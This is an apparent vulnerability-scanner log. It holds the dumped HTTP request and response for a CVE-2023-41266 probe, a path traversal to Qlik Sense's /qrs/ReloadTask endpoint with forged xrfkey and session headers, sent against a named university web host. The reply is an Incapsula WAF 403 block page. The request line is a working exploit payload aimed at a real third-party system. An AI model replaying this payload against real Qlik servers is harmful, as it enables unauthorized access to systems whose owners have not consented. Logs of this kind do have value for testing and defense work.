[CVE-2023-41266] Dumped HTTP request for https://law.app.unimelb.edu.au/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf


GET /resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf HTTP/1.1
Host: law.app.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337
X-Qlik-Xrfkey: 1333333333333337
Accept-Encoding: gzip


[CVE-2023-41266] Dumped HTTP response https://law.app.unimelb.edu.au/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 832
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3148830=aMqbZ5hnQDm41diI1ya+cBZyk2gAAAAAQUIPAAAAAAD9+7DUxxiiTeLT65YWvRcE; expires=Thu, 06 Aug 2026 08:08:47 GMT; HttpOnly; path=/; Domain=.app.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_1540_3148830=eSNfC1iwkT484mxVQi5fFRZyk2gAAAAAC7dMuYYDs2Ogr7y9ugAyvg==; path=/; Domain=.app.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 6-4131415-0 0NNN RT(1754493462833 8) q(0 -1 -1 -1) r(0 -1) B15(3,502224,0) U24

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/faile-to-of-almost-ther-th-to-a-Racessage-and-dy" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=6-4131415-0%200NNN%20RT%281754493462833%208%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%283%2c502224%2c0%29%20U24&incident_id=1540000460019851443-20105880179837830&edet=15&cinfo=03000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 1540000460019851443-20105880179837830</iframe></body></html>
